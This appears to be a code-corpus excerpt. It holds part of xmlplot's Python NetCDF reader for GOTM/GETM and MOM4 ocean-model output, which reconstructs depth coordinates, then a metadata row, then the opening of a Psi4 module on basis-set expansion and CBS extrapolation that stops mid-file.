ncvar = nc.createVariable(varName,datatype,dimensions)
return self.getVariable_raw(varName)
def copyVariable(self,variable,name=None,dims=None):
assert self.mode in ('w','a','r+'),'NetCDF file has not been opened for writing.'
assert isinstance(variable,NetCDFStore.NetCDFVariable),'Added variable must be an existing NetCDF variable object, not %s.' % str(variable)
shape = variable.getShape()
props = variable.getProperties()
if dims is None: dims = variable.getDimensions_raw()
nc = self.getcdf()
for dim,length in zip(dims,shape):
if dim not in nc.dimensions: self.createDimension(dim, length)
data = variable.getSlice((Ellipsis,),dataonly=True)
nctype = {'float32':'f','float64':'d'}[str(data.dtype)]
if name is None: name = variable.getName()
var = self.addVariable(name,dims,datatype=nctype,missingvalue=props.get('_FillValue',None))
for key,value in props.iteritems():
try:
var.setProperty(key,value)
except AttributeError: # netcdf-python does not allow _FillValue to be set after variable creation - ignore this.
if key!='_FillValue': raise
var.setData(data)
return var
def getDimensions(self):
nc = self.getcdf()
ncdims = list(nc.dimensions)
def cmpdims(x,y):
for v in nc.variables.values():
if x in v.dimensions and y in v.dimensions:
curdims = list(v.dimensions)
return cmp(curdims.index(x),curdims.index(y))
return 0
ncdims.sort(cmp=cmpdims)
return ncdims
def getDimensionLength(self,dimname):
nc = self.getcdf()
length = nc.dimensions[dimname]
isunlimited = length is None
if not (length is None or isinstance(length,int)):
# NetCDF4 uses dimension objects.
isunlimited = length.isunlimited()
length = len(length)
elif isunlimited:
# NetCDF3: locate length of unlimited dimension manually.
for vn in nc.variables.keys():
v = nc.variables[vn]
if dimname in v.dimensions:
curdims = list(v.dimensions)
length = v.shape[curdims.index(dimname)]
break
return length,isunlimited
def getDefaultCoordinateDelta(self,dimname,coord):
return 1.
def isTimeDimension(self,dimname):
"""See if specified dimension is a time dimension according to COARDS convention.
"""
try:
timeunit,timeref = self.getTimeReference(dimname)
except ReferenceTimeParseError:
return False
return True
def getTimeReference(self,dimname):
"""Parses the "units" attribute of the NetCDF variable, and returns the time unit
(in days) and the reference date. Throws an exception if the "units" attribute does
not match the COARDS/udunits convention for specifying time offsets.
"""
nc = self.getcdf()
if dimname not in nc.variables:
raise ReferenceTimeParseError('dimension "%s" does not have an associated variable.' % (dimname,))
cdfvar = self.getcdf().variables[dimname]
if not hasattr(cdfvar,'units'):
raise ReferenceTimeParseError('variable "%s" lacks "units" attribute.' % (dimname,))
return parseNcTimeUnit(cdfvar.units)
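# High-level usage sketch for NetCDFStore (hypothetical file and variable names):
#
#   store = NetCDFStore('result.nc')
#   print store.getVariableNames_raw()
#   var = store.getVariable_raw('temp')
#   if var is not None:
#       varslice = var.getSlice((Ellipsis,))   # Variable.Slice with data and coordinates
#       print varslice.data.shape
#   store.unlink()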
class NetCDFStore_GOTM(NetCDFStore):
"""Class encapsulating a GOTM/GETM-produced NetCDF file.
The file is expected to follow the COARDS/CF convention, and in addition assumes
- the GOTM/GETM convention for storing time-variable depth/layer heights (h + elev).
- the GETM convention for curvilinear grids (xic, etac -> lonc, latc)
"""
@staticmethod
def testFile(nc):
match = False
ncvars,ncdims = nc.variables,nc.dimensions
# Test for GETM with curvilinear coordinates
# (either lon,lat or staggered Cartesian coordinates must be available)
if ('xic' in ncdims and 'etac' in ncdims and
(('lonc' in ncvars and 'latc' in ncvars)
or ('xx' in ncvars and 'yx' in ncvars))): match = True
# Test for GETM with cartesian coordinates
if 'xc' in ncdims and 'yc' in ncdims and 'lonc' in ncvars and 'latc' in ncvars: match = True
# Test for GOTM convention for depth represented by layer heights and surface elevation.
if 'z' in ncdims and 'z1' in ncdims and 'h' in ncvars and 'zeta' in ncvars: match = True
# Test for GETM convention for general, hybrid or adaptive vertical coordinates.
if 'level' in ncdims and 'bathymetry' in ncvars and ('h' in ncvars or 'hmean' in ncvars): match = True
# Test for GETM convention for sigma vertical coordinates.
if 'sigma' in ncdims and 'bathymetry' in ncvars and ('elev' in ncvars or 'elevmean' in ncvars): match = True
return match
def __init__(self,path=None,*args,**kwargs):
self.hname,self.elevname = 'h','zeta'
self.bathymetryname = None
self.depthdim = None
# Link new depth coordinates to an existing NetCDF dimension
self.depth2coord = {}
self.generatecartesiancenters = False
NetCDFStore.__init__(self,path,*args,**kwargs)
def autoReassignCoordinates(self):
NetCDFStore.autoReassignCoordinates(self)
# Get reference to NetCDF file and its variables and dimensions.
nc = self.getcdf()
ncvars,ncdims = self.getVariableNames_raw(),nc.dimensions
# --------------------------------------------------------------
# Re-assign x,y coordinate dimensions
# --------------------------------------------------------------
# Re-assign for GETM with curvilinear coordinates
# Preferentially, x and y are re-assigned to longitude and latitude.
# If these are not available, they will be re-assigned to projected x and y instead.
# Do this for centre coordinates ("c"), corner coordinates ("x"), u coordinates ("u") and v coordinates ("v").
for pt in 'cxuv':
if 'xi'+pt not in ncdims or 'eta'+pt not in ncdims: continue
if 'lon'+pt in ncvars and 'lat'+pt in ncvars:
self.defaultcoordinates['xi' +pt] = 'lon'+pt
self.defaultcoordinates['eta'+pt] = 'lat'+pt
elif 'x'+pt in ncvars and 'y'+pt in ncvars:
self.defaultcoordinates['xi' +pt] = 'x'+pt
self.defaultcoordinates['eta'+pt] = 'y'+pt
# Re-assign for GETM with cartesian coordinates.
# x and y are re-assigned to longitude and latitude, if possible.
if 'xc' in ncdims and 'yc' in ncdims:
# Center coordinates are available.
if 'lonc' in ncvars and 'latc' in ncvars:
self.defaultcoordinates['xc' ] = 'lonc'
self.defaultcoordinates['yc'] = 'latc'
if 'xx' in ncdims and 'yx' in ncdims:
# Boundary coordinates are available.
if 'lonx' in ncvars and 'latx' in ncvars:
self.defaultcoordinates['xx'] = 'lonx'
self.defaultcoordinates['yx'] = 'latx'
# --------------------------------------------------------------
# Re-assign vertical dimension
# NB this is done automatically for GOTM, because the original
# z and z1 variables are overwritten.
# --------------------------------------------------------------
if 'level' in ncdims and 'bathymetry' in ncvars and ('h' in ncvars or 'hmean' in ncvars):
# GETM with general, hybrid or adaptive vertical coordinates
# Depth will be computed from bathymetry(x,y) and layer heights(x,y,z,t).
# Depth dimension is called "level".
self.defaultcoordinates['level'] = 'z'
self.bathymetryname = 'bathymetry'
self.hname = 'h' if 'h' in ncvars else 'hmean'
self.elevname = None
self.depth2coord['z'] = 'level'
self.depthdim = 'level'
elif 'sigma' in ncdims and 'bathymetry' in ncvars and ('elev' in ncvars or 'elevmean' in ncvars):
# GETM with sigma coordinates
# Depth will be computed from bathymetry(x,y), surface elevation(x,y,t) and sigma(z).
# Depth dimension is called "sigma".
self.defaultcoordinates['sigma'] = 'z'
self.bathymetryname = 'bathymetry'
self.hname = None
self.elevname = 'elev' if 'elev' in ncvars else 'elevmean'
self.depth2coord['z'] = 'sigma'
self.depthdim = 'sigma'
elif 'z' in ncdims:
# GETM or GOTM with z coordinates.
# Depth dimension is called "z".
self.depthdim = 'z'
def getVariableNames_raw(self):
names = list(NetCDFStore.getVariableNames_raw(self))
nc = self.getcdf()
ncvars,ncdims = nc.variables,nc.dimensions
if self.depthdim is not None:
if 'z' not in names: names.append('z')
if 'z1' in ncdims and 'z1' not in names: names.append('z1')
self.generatecartesiancenters = self.generatecartesiancenters or ('xx' in ncvars and 'yx' in ncvars and 'xic' in ncdims and 'etac' in ncdims and 'xc' not in ncvars and 'yc' not in ncvars)
if self.generatecartesiancenters: names += ['xc','yc']
return names
def getVariable_raw(self,varname):
class CenterVariable(NetCDFStore.NetCDFVariable):
def __init__(self,store,ncvarname):
NetCDFStore.NetCDFVariable.__init__(self,store,ncvarname)
self.centername = ncvarname
self.stagname = '%sx' % ncvarname[0]
def getShape(self):
s = self.store[self.stagname].getShape()
return (s[0]-1,s[1]-1)
def getLongName(self):
return '%s-position' % self.centername
def getUnit(self):
return self.store[self.stagname].getUnit()
def getProperties(self):
props = {'history':'auto-generated from boundary coordinates in variable %s' % self.stagname}
props['bounds'] = self.stagname
return props
def getDataType(self):
return self.store[self.stagname].getDataType()
def getDimensions_raw(self):
return ('etac','xic')
def getNcData(self,bounds=None,allowmask=True):
# If no bounds are set, use complete data range.
if bounds is None:
shape = self.getShape()
bounds = (slice(0,shape[0]),slice(0,shape[1]))
# Convert integer indices to slices so we always have 2 dimensions.
fullbounds = []
for b in bounds:
if isinstance(b,int): b = slice(b,b+1)
fullbounds.append(b)
# Obtain all 4 corners
stagvar = self.store[self.stagname]
stagvals = stagvar.getSlice(fullbounds,dataonly=True).copy()
oldbound0 = fullbounds[0]
fullbounds[0] = slice(fullbounds[0].start+1,fullbounds[0].stop+1,fullbounds[0].step)
stagvals += stagvar.getSlice(fullbounds,dataonly=True)
fullbounds[1] = slice(fullbounds[1].start+1,fullbounds[1].stop+1,fullbounds[1].step)
stagvals += stagvar.getSlice(fullbounds,dataonly=True)
fullbounds[0] = oldbound0
stagvals += stagvar.getSlice(fullbounds,dataonly=True)
# Average the corners to obtain center coordinates
centers = stagvals/4.
# Eliminate singleton dimensions where integer indices were used.
if bounds is not None:
newshape = []
for l,b in zip(centers.shape,bounds):
if not isinstance(b,int): newshape.append(l)
centers.shape = newshape
# Return center coordinates.
return centers
class DepthVariable(NetCDFStore.NetCDFVariable):
def __init__(self,store,ncvarname,dimname):
NetCDFStore.NetCDFVariable.__init__(self,store,ncvarname)
self.dimname = dimname
self.cacheddims = None
self.cachedshape = None
def getName_raw(self):
return self.dimname
def getLongName(self):
return 'depth'
def getUnit(self):
if self.store.elevname is not None:
return self.store[self.store.elevname].getUnit()
else:
return self.store[self.store.hname].getUnit()
def getProperties(self):
if self.store.bathymetryname is None:
props = {'history':'auto-generated from layer thickness and surface elevation.'}
else:
props = {'history':'auto-generated from sigma levels, elevation and bathymetry.'}
if not self.dimname.endswith('_stag'): props['bounds'] = self.dimname + '_stag'
return props
def getDataType(self):
if self.store.elevname is not None:
return self.store[self.store.elevname].getDataType()
else:
return self.store[self.store.hname].getDataType()
def getDimensions_raw(self):
if self.cacheddims is None:
def addvar(name):
if name is None or name not in self.store: return
curvar = self.store[name]
curdims = curvar.getDimensions_raw()
dims.update(curdims)
for d,l in zip(curdims,curvar.getShape()): dim2length[d] = l
nc = self.store.getcdf()
# Get the set of dimensions (unordered) for all source variables combined.
dims = set((self.store.depthdim,))
dim2length = {self.store.depthdim:self.store.getDimensionLength(self.store.depthdim)[0]}
addvar(self.store.bathymetryname)
addvar(self.store.hname)
addvar(self.store.elevname)
# Order dimensions
for v in nc.variables.values():
if all([d in v.dimensions for d in dims]): break
else:
assert False,'None of the NetCDF variables uses all dimensions that are needed for the depth coordinate.'
self.cacheddims = [d for d in v.dimensions if d in dims]
# Save shape
self.cachedshape = [dim2length[d] for d in self.cacheddims]
if self.dimname.endswith('_stag'):
self.cachedshape = tuple([l+1 for l in self.cachedshape])
# Rename depth dimension
self.izdim = self.cacheddims.index(self.store.depthdim)
centercoord = self.dimname
if self.dimname.endswith('_stag'): centercoord = centercoord[:-5]
dimname = self.store.depth2coord.get(centercoord,centercoord)
if self.dimname.endswith('_stag'): dimname = dimname+'_stag'
self.cacheddims[self.izdim] = dimname
# Re-assign dimensions if needed.
return self.cacheddims
def getShape(self):
if self.cachedshape is None:
self.getDimensions_raw()
return self.cachedshape
def getNcData(self,bounds=None,allowmask=True):
# Return values from cache if available.
if self.dimname in self.store.cachedcoords:
if bounds is None:
return self.store.cachedcoords[self.dimname]
else:
return self.store.cachedcoords[self.dimname][bounds]
cachebasedata = bounds is not None
izdim = self.izdim
# Determine list of dimensions and desired shape for depth source variables
# (bathymetry, elevation, layer heights)
dims = list(self.getDimensions_raw())
dims[izdim] = self.store.depthdim
shape = list(self.getShape())
if self.dimname.endswith('_stag'): shape = [l-1 for l in shape]
if bounds is not None:
# Determine dimension boundaries for the source variables.
assert len(bounds)==len(shape),'Number of bounds (%i) does not match the variable shape (%s)' % (len(bounds),','.join(map(str,shape)))
newbounds = []
for i,l in enumerate(bounds):
if i==izdim:
# depth dimension: we need the complete range.
l = slice(None)
elif isinstance(l,int):
# integer index: convert to slice with length 1 to preserve rank and dimension order.
l = slice(l,l+1)
elif self.dimname.endswith('_stag'):
# If we need staggered coordinates, all dimensions will expand by 1
# in the end. Therefore, subtract 1 from their length here.
l = slice(l.start,l.stop-l.step,l.step)
start,stop,step = l.indices(shape[i])
shape[i] = 1+int((stop-start-1)/step)
newbounds.append(l)
def getvardata(name):
var = self.store[name]
vardims = var.getDimensions_raw()
if bounds is None:
varbounds = None
else:
varbounds = [newbounds[dims.index(d)] for d in vardims]
data = var.getSlice(varbounds,dataonly=True,cache=cachebasedata)
dimlengths = dict(zip(vardims,data.shape))
assert len(vardims)==data.ndim,'%s: number of variable dimensions and array rank do not match.' % name
data.shape = [dimlengths.get(d,1) for d in dims]
return data
def takezrange(array,start,stop=None):
slc = [slice(None)]*array.ndim
if isinstance(start,slice):
slc[izdim] = start
else:
slc[izdim] = slice(start,stop)
return array[slc]
mask = numpy.ma.nomask
data = {}
# Subroutine for creating and updating the depth mask.
def setmask(mask,newmask):
if mask is numpy.ma.nomask:
# Create new depth mask based on provided mask, allowing for broadcasting.
mask = numpy.empty(shape,dtype=numpy.bool)
mask[...] = newmask
else:
# Combine provided mask with existing one.
mask |= newmask
return mask
def getElevations(mask,bath=None):
# Get elevations
elev = getvardata(self.store.elevname)
# If elevations are (partially) masked, first fill the first layer of masked cells around
# the data with a nearest-neighbor approach. This improves the elevations of interfaces.
# Then save the mask so we can reapply it later.
elevmask = numpy.ma.getmask(elev)
if elevmask is not numpy.ma.nomask:
if numpy.any(elevmask):
# Add elevation mask to global depth mask (NB getvardata will have inserted z dimension already).
mask = setmask(mask,elevmask)
# Set masked (land) edges of domain to nearest (in x,y space) neighbouring elevation values.
# This is needed to allow the inference of corner points that fall outside the domain bounded by centre coordinates.
elev = xmlplot.common.interpolateEdges(elev)
elevmask = numpy.ma.getmask(elev)
# Let elevation follow bathymetry where it is still masked.
if bath is not None and elevmask is not numpy.ma.nomask:
bigbath = numpy.empty_like(elev)
bigbath[...] = bath
elev[elevmask] = -bigbath[elevmask]
# Eliminate elevation mask.
# If bathymetry is available, this will be used later to make masked elevations follow bathymetry.
# This will allow all layers in the masked domain to have height zero.
elev = elev.filled(0.)
return elev,mask
def getLayerHeights(mask):
# Get layer heights
h = getvardata(self.store.hname)
# Fill masked values (we do not want coordinate arrays with masked values)
# This should not have any effect, as the value arrays should also be masked at
# these locations.
hmask = numpy.ma.getmask(h)
if hmask is not numpy.ma.nomask:
# Add layer height mask to global depth mask.
mask = setmask(mask,hmask)
# Set masked (land) edges of domain to nearest (in x,y space) neighbouring layer heights.
# This is needed to allow the inference of corner points that fall outside the domain bounded by centre coordinates.
ipaxes = [i for i in range(len(h.shape)) if i!=izdim]
h = xmlplot.common.interpolateEdges(h,dims=ipaxes)
# Fill remaining masked layer heights with zero.
h = h.filled(0.)
return h,mask
def getBathymetry(mask):
# Get bathymetry (distance between geoid/mean sea level and bottom)
bath = getvardata(self.store.bathymetryname)
# Check bathymetry mask.
bathmask = numpy.ma.getmask(bath)
if bathmask is not numpy.ma.nomask:
# Add bathymetry mask to global depth mask.
mask = setmask(mask,bathmask)
# Set masked (land) edges of domain to nearest (in x,y space) neighbouring bathymetry values.
# This is needed to allow the inference of corner points that fall outside the domain bounded by centre coordinates.
bath = xmlplot.common.interpolateEdges(bath)
# Fill the remaining masked bathymetry with the shallowest value in the domain.
fillbath = bath.min()
if self.store.elevname is not None: fillbath = min(fillbath,-getvardata(self.store.elevname).max())
bath = bath.filled(fillbath)
return bath,mask
# Depth can be reconstructed in three ways:
# elevations + layer heights (GOTM)
# bathymetry + layer heights (GETM, no sigma coordinates)
# bathymetry + elevations + sigma (GETM, sigma coordinates)
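# Editorial sketch of the GOTM branch below (assuming izdim is the depth axis):
# interfaces are the cumulative sum of layer heights, shifted so that the top
# interface coincides with the elevation:
#   z_stag = [0, h0, h0+h1, ...] - (sum(h) - elev)
# which makes z_stag[-1]==elev and z_stag[0]==elev-sum(h) (the bottom).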
if self.store.bathymetryname is None:
# GOTM: reconstruct from elevations + layer heights
# Get elevations
elev,mask = getElevations(mask)
# Get layer heights.
h,mask = getLayerHeights(mask)
# Get depths of interfaces
z_stag = numpy.concatenate((numpy.zeros_like(h.take((0,),axis=izdim)),h.cumsum(axis=izdim)),axis=izdim)
depth = z_stag.take((-1,),axis=izdim)-elev
z_stag -= depth
# Get depths of layer centers
z = takezrange(z_stag,1)-0.5*h
# The actual interface coordinate z1 lacks the bottom interface
z1 = takezrange(z_stag,1)
# Store depth coordinates
data['z'] = z
data['z1'] = z1
if bounds is None or self.dimname in ('z_stag','z1_stag'):
# Use the actual top and bottom of the column as boundary interfaces for the
# grid of the interface coordinate.
z1_stag = numpy.concatenate((numpy.take(z_stag,(0,),axis=izdim),takezrange(z,1),numpy.take(z_stag,(-1,),axis=izdim)),axis=izdim)
# Use normal staggering for the time, longitude and latitude dimension.
remdims = [i for i in range(z_stag.ndim) if i!=izdim]
data['z_stag'] = xmlplot.common.stagger(z_stag, remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
data['z1_stag'] = xmlplot.common.stagger(z1_stag,remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
elif self.store.hname is not None:
# GETM (no sigma coordinates): reconstruct from bathymetry and layer heights
# Get bathymetry
bath,mask = getBathymetry(mask)
# Get layer heights.
h,mask = getLayerHeights(mask)
# Calculate depth of layer interfaces
z_stag = numpy.concatenate((numpy.zeros_like(h.take((0,),axis=izdim)),h.cumsum(axis=izdim)),axis=izdim)
z_stag -= bath
# Get depths of layer centers
z = takezrange(z_stag,1)-0.5*h
# Store depth coordinates
data['z'] = z
if bounds is None or self.dimname=='z_stag':
# Use normal staggering for the time, longitude and latitude dimension.
remdims = [i for i in range(z_stag.ndim) if i!=izdim]
data['z_stag'] = xmlplot.common.stagger(z_stag, remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
else:
# Get bathymetry
bath,mask = getBathymetry(mask)
# Get elevations
elev,mask = getElevations(mask,bath)
# Calculate water depth at each point in time
# Clip it at zero: nearest neighbor interpolation of elevations may have
# caused water levels below the bottom.
depth = numpy.maximum(bath+elev,0.)
# Get sigma levels (constant across time and space)
sigma = getvardata('sigma')
# From sigma levels and water depth, calculate the z coordinates.
data['z'] = sigma*depth + elev
if bounds is None or self.dimname=='z_stag':
# Calculate staggered sigma coordinates
sigma_stag_shape = list(sigma.shape)
sigma_stag_shape[izdim] += 1
sigma_stag = numpy.empty(sigma_stag_shape,dtype=sigma.dtype)
takezrange(sigma_stag,0, 1)[...] = -1.
takezrange(sigma_stag,1,-1)[...] = 0.5*(takezrange(sigma,0,-1)+takezrange(sigma,1))
takezrange(sigma_stag,-1 )[...] = 0.
# First stagger in depth dimension.
z_stag = sigma_stag*depth + elev
# Use default staggering for remaining dimensions of staggered z.
remdims = [i for i in range(z_stag.ndim) if i!=izdim]
data['z_stag'] = xmlplot.common.stagger(z_stag,dimindices=remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
# Apply the mask (if any) to the center coordinates
if mask is not numpy.ma.nomask:
data['z'] = numpy.ma.masked_where(mask,data['z'],copy=False)
# If we retrieve the entire range, store all coordinates in cache
# and return the slice we need.
if bounds is None:
self.store.cachedcoords.update(data)
return data[self.dimname]
# Retrieve the desired coordinates.
res = data[self.dimname]
# Now finally take the depth range that we need
depthslice = bounds[izdim]
if isinstance(depthslice,int): depthslice = slice(depthslice,depthslice+1)
res = takezrange(res,depthslice)
# Undo the staggering for the dimension that we take a single slice through.
if self.dimname.endswith('_stag'):
# This is a staggered variable - average left and right bounds for indexed dimensions.
for i in range(len(bounds)-1,-1,-1):
if isinstance(bounds[i],int): res = res.mean(axis=i)
else:
# This is a non-staggered variable - take out the indexed dimensions.
res.shape = [l for i,l in enumerate(res.shape) if not isinstance(bounds[i],int)]
return res
if self.generatecartesiancenters and varname in ('xc','yc'):
return CenterVariable(self,varname)
elif varname in ('z','z1','z_stag','z1_stag'):
return DepthVariable(self,varname,varname)
return NetCDFStore.getVariable_raw(self,varname)
def getDefaultCoordinateDelta(self,dimname,coords):
# Only operate on 1D coordinates
if coords.ndim>1: return NetCDFStore.getDefaultCoordinateDelta(self,dimname,coords)
# Only operate on time dimension
try:
timeunit,timeref = self.getTimeReference(dimname)
except ReferenceTimeParseError:
return NetCDFStore.getDefaultCoordinateDelta(self,dimname,coords)
# Take delta as the difference between the reference time and the first time step
if coords[0]>timeref: return coords[0]-timeref
return 1.
class NetCDFStore_MOM4(NetCDFStore):
@staticmethod
def testFile(nc):
match = False
ncvars,ncdims = nc.variables,nc.dimensions
if ('xt_ocean' in ncdims and 'yt_ocean' in ncdims and
'geolon_t' in ncvars and 'geolat_t' in ncvars): match = True
return match
def __init__(self,path=None,*args,**kwargs):
NetCDFStore.__init__(self,path,*args,**kwargs)
def autoReassignCoordinates(self):
NetCDFStore.autoReassignCoordinates(self)
# Re-assign x,y coordinate dimensions to longitude, latitude
nc = self.getcdf()
ncvars,ncdims = nc.variables,nc.dimensions
if ('xt_ocean' in ncdims and 'yt_ocean' in ncdims and
'geolon_t' in ncvars and 'geolat_t' in ncvars):
lon = numpy.ma.compressed(getNcData(ncvars['geolon_t']))
# Only reassign dimension if alternative coordinate values have a meaningful value.
if lon.shape[0]>0 and (lon!=lon[0]).any():
self.defaultcoordinates['xt_ocean' ] = 'geolon_t'
self.defaultcoordinates['yt_ocean'] = 'geolat_t'
if ('xu_ocean' in ncdims and 'yu_ocean' in ncdims and
'geolon_c' in ncvars and 'geolat_c' in ncvars):
lon = numpy.ma.compressed(getNcData(ncvars['geolon_c']))
# Only reassign dimension if alternative coordinate values have a meaningful value.
if lon.shape[0]>0 and (lon!=lon[0]).any():
self.defaultcoordinates['xu_ocean' ] = 'geolon_c'
self.defaultcoordinates['yu_ocean'] = 'geolat_c'
NetCDFStore.registerConvention(NetCDFStore_GOTM)
NetCDFStore.registerConvention(NetCDFStore_MOM4)
|
BoldingBruggeman/gotm
|
gui.py/xmlplot/data/netcdf.py
|
Python
|
gpl-2.0
| 87,431
|
[
"NetCDF"
] |
60b840e869077281b5d23c326a37e92d1aedb6feb4f8722d153e79c0fb2f3a2b
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import math
import re
import sys
from typing import Callable, List
import numpy as np
from psi4 import core
from psi4.driver import qcdb
from psi4.driver import p4util
from psi4.driver import driver_util
from psi4.driver import psifiles as psif
from psi4.driver.p4util.exceptions import *
from psi4.driver.procrouting.interface_cfour import cfour_psivar_list
zeta_values = 'dtq5678'
_zeta_val2sym = {k + 2: v for k, v in enumerate(zeta_values)}
_zeta_sym2val = {v: k for k, v in _zeta_val2sym.items()}
_addlremark = {'energy': '', 'gradient': ', GRADIENT', 'hessian': ', HESSIAN'}
_lmh_labels = {
1: ['HI'],
2: ['LO', 'HI'],
3: ['LO', 'MD', 'HI'],
4: ['LO', 'MD', 'M2', 'HI'],
5: ['LO', 'MD', 'M2', 'M3', 'HI']
}
def _expand_bracketed_basis(basisstring: str, molecule=None):
"""Function to transform and validate basis series specification for cbs().
Parameters
----------
basisstring
A string containing the basis sets to be expanded.
A basis set with no paired square brackets is passed through
with zeta level 0 (e.g., ``'6-31+G(d,p)'`` is returned as
``(["6-31+G(d,p)"], [0])``). A basis set with square brackets is checked
for sensible sequence and returned as separate basis sets
(e.g., ``'cc-pV[Q5]Z'`` is returned as ``(["cc-pVQZ", "cc-pV5Z"], [4, 5])``).
Allows out-of-order zeta specification (e.g., ``[qtd]``) and numeral for
number (e.g., ``[23]``). Does not allow skipped zetas (e.g., ``[dq]``), zetas
outside the [2,8] range, non-Dunning, non-Ahlrichs, or non-Jensen sets,
or non-findable .gbs sets.
molecule : qcdb.molecule or psi4.core.Molecule
This function checks that the basis is valid by trying to build
the qcdb.BasisSet object for *molecule* or for H2 if None.
Returns
-------
tuple
Tuple in the ``([basis set names], [basis set zetas])`` format.
"""
BSET = []
ZSET = []
legit_compound_basis = re.compile(
r'^(?P<pre>.*cc-.*|def2-|.*pcs+eg-|.*)\[(?P<zeta>[dtq2345678,s1]*)\](?P<post>.*z.*|)$', re.IGNORECASE)
pc_basis = re.compile(r'.*pcs+eg-$', re.IGNORECASE)
def2_basis = re.compile(r'def2-', re.IGNORECASE)
zapa_basis = re.compile(r'.*zapa.*', re.IGNORECASE)
if legit_compound_basis.match(basisstring):
basisname = legit_compound_basis.match(basisstring)
# handle def2-svp* basis sets as double-zeta
if def2_basis.match(basisname.group('pre')):
bn_gz = basisname.group('zeta').replace("s", "d")
# handle pc-n basis set polarisation -> zeta conversion
elif pc_basis.match(basisname.group('pre')):
bn_gz = basisname.group('zeta').replace("4", "5").replace("3", "4").replace("2", "3").replace("1", "2")
else:
bn_gz = basisname.group('zeta')
# filter out commas and be forgiving of e.g., t5q or 3q
zetas = [z for z in zeta_values if (z in bn_gz or str(zeta_values.index(z) + 2) in bn_gz)]
for b in zetas:
if ZSET and (int(ZSET[len(ZSET) - 1]) - zeta_values.index(b)) != 1:
raise ValidationError("""Basis set '%s' has skipped zeta level '%s'.""" %
(basisstring, _zeta_val2sym[_zeta_sym2val[b] - 1]))
# reassemble def2-svp* properly instead of def2-dzvp*
if def2_basis.match(basisname.group('pre')) and b == "d":
BSET.append(basisname.group('pre') + "s" + basisname.group('post')[1:])
# reassemble pc-n basis sets properly
elif pc_basis.match(basisname.group('pre')):
BSET.append(basisname.group('pre') + "{0:d}".format(_zeta_sym2val[b] - 1))
# assemble nZaPa basis sets
elif zapa_basis.match(basisname.group('post')):
bzapa = b.replace("d", "2").replace("t", "3").replace("q", "4")
BSET.append(basisname.group('pre') + bzapa + basisname.group('post'))
else:
BSET.append(basisname.group('pre') + b + basisname.group('post'))
ZSET.append(zeta_values.index(b) + 2)
elif re.match(r'.*\[.*\].*$', basisstring, flags=re.IGNORECASE):
raise ValidationError(
"""Basis series '%s' invalid. Specify a basis series matching"""
""" '*cc-*[dtq2345678,]*z*'. or 'def2-[sdtq]zvp*' or '*pcs[s]eg-[1234]' or '[1234567]ZaPa' """ %
(basisstring))
else:
BSET.append(basisstring)
ZSET.append(0)
if molecule is None:
molecule = """\nH\nH 1 1.00\n"""
elif isinstance(molecule, core.Molecule):
molecule = qcdb.Molecule(molecule.to_dict())
for basis in BSET:
try:
qcdb.BasisSet.pyconstruct(molecule, "BASIS", basis)
except qcdb.BasisSetNotFound as e:
raise ValidationError(f"""Basis set '{basis}' not available for molecule.""") from e
return (BSET, ZSET)
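# Editorial sketch of expected behaviour (examples from the docstring; real
# calls additionally validate each member basis via qcdb.BasisSet.pyconstruct):
#   _expand_bracketed_basis('6-31+G(d,p)') -> (['6-31+G(d,p)'], [0])
#   _expand_bracketed_basis('cc-pV[Q5]Z') -> (['cc-pVQZ', 'cc-pV5Z'], [4, 5])
#   _expand_bracketed_basis('cc-pV[DQ]Z') -> ValidationError (skipped zeta)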
def _contract_bracketed_basis(basisarray: List):
"""Function to reform a bracketed basis set string from a sequential series
of basis sets. Essentially the inverse of _expand_bracketed_basis(). Used to
print a nicely formatted basis set string in the results table.
Parameters
----------
basisarray
Basis set names, differing by zeta level, e.g. ``["cc-pvqz", "cc-pv5z"]``.
Returns
-------
string
A nicely formatted basis set string, e.g. ``"cc-pv[q5]z"`` for the above example.
"""
if len(basisarray) == 1:
return basisarray[0]
else:
zetaindx = [i for i in range(len(basisarray[0])) if basisarray[0][i] != basisarray[1][i]][0]
ZSET = [bas[zetaindx] for bas in basisarray]
pre = basisarray[1][:zetaindx]
post = basisarray[1][zetaindx + 1:]
basisstring = pre + '[' + ''.join(ZSET) + ']' + post
return basisstring
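# Editorial sketch (helper not in the original module): round-tripping the two
# pure-string routines above on an already-expanded basis list.
def _demo_contract_bracketed_basis():
    assert _contract_bracketed_basis(["cc-pvqz", "cc-pv5z"]) == "cc-pv[q5]z"
    assert _contract_bracketed_basis(["cc-pvtz"]) == "cc-pvtz"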
def xtpl_highest_1(functionname: str, zHI: int, valueHI: float, verbose: bool = True, **kwargs):
r"""Scheme for total or correlation energies with a single basis or the highest
zeta-level among an array of bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zHI
Zeta-level, only used for printing.
valueHI
Value of the CBS component.
Returns
-------
float
Returns :math:`E_{total}^{\infty}` which is equal to valueHI.
Notes
-----
.. math:: E_{total}^X = E_{total}^{\infty}
"""
if isinstance(valueHI, float):
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> %s <==\n\n""" % (functionname.upper())
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
core.print_out(cbsscheme)
return valueHI
elif isinstance(valueHI, (core.Matrix, core.Vector)):
if verbose > 2:
core.print_out(""" HI-zeta (%s) Total Energy:\n""" % (str(zHI)))
valueHI.print_out()
return valueHI
def scf_xtpl_helgaker_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
